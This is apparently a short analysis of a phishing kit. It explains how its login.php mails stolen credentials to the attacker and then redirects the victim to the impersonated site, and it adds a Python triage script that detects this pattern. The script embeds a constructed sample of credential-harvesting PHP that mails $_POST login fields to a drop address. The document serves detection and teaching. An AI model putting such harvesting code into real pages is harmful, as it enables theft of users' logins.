Inside this phishing kit
https://www.virustotal.com/en/file/3521521d631a33a6e79d282774a77e0ed21cf92fc8b901bbc19f1f370055fa37/analysis/1515876307/
There is a login.php
that ends up mailing the user's credentials to the attacker
But notice the last line of login.php:
header("Location: http://www.zoominfo.com/business/customer-success");
What is that, you may ask?
The PHP header() function sends a raw HTTP header, per the manual
http://php.net/manual/en/function.header.php
Which header? The Location header
https://en.wikipedia.org/wiki/HTTP_location
"To ask a web browser to load a different web page"
So this line in the phishing kit is basically saying: after the user gives the bad guy their credentials, the bad guy mails them to himself. He then no longer cares about the user, so he redirects them to the legitimate zoominfo.com (the site he phished) to make the victim think they were on the legit site all along.
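For triage, the mail-then-redirect pattern described above can be flagged statically. The following is an added example, not code from the kit or from this post: the sample PHP is constructed from the description (only the header() line is taken from the page), and the drop address, the hosting domain and the function name triage_php are assumptions.

```python
import re

# Constructed sample resembling the login.php described above (not the kit's real code).
SAMPLE_LOGIN_PHP = r'''<?php
$msg = "User: " . $_POST['username'] . " Pass: " . $_POST['password'];
mail("drop@example.invalid", "login", $msg);
header("Location: http://www.zoominfo.com/business/customer-success");
?>'''

# header("Location: <absolute URL>"), single or double quoted; group 2 is the host.
REDIRECT_RE = re.compile(
    r'''header\s*\(\s*["']\s*Location\s*:\s*(https?://([^/"'\s]+)[^"']*)["']''',
    re.IGNORECASE)
MAIL_RE = re.compile(r'\bmail\s*\(', re.IGNORECASE)
INPUT_RE = re.compile(r'\$_(POST|GET|REQUEST)\b')


def is_external(host, hosting_domain):
    """True when the redirect host is not the domain the file is served from."""
    if hosting_domain is None:
        return True
    d = hosting_domain.lower()
    return not (host == d or host.endswith("." + d))


def triage_php(source, hosting_domain=None):
    """Flag a PHP file that reads form input, calls mail(), and then sends the
    browser to an absolute URL on another host (the likely impersonated site)."""
    redirects = [
        {"url": m.group(1), "host": m.group(2).lower(),
         "external": is_external(m.group(2).lower(), hosting_domain)}
        for m in REDIRECT_RE.finditer(source)
    ]
    reads_input = bool(INPUT_RE.search(source))
    calls_mail = bool(MAIL_RE.search(source))
    return {
        "reads_form_input": reads_input,
        "calls_mail": calls_mail,
        "redirects": redirects,
        "suspicious": reads_input and calls_mail
                      and any(r["external"] for r in redirects),
    }


if __name__ == "__main__":
    # hosting_domain is a hypothetical name for the site where the kit was found.
    print(triage_php(SAMPLE_LOGIN_PHP, hosting_domain="compromised-host.example"))
```

This is a heuristic: a legitimate contact form that mails its input and redirects off-site will also match, so a hit means "look at this file", and the extracted redirect host tells you which brand to notify.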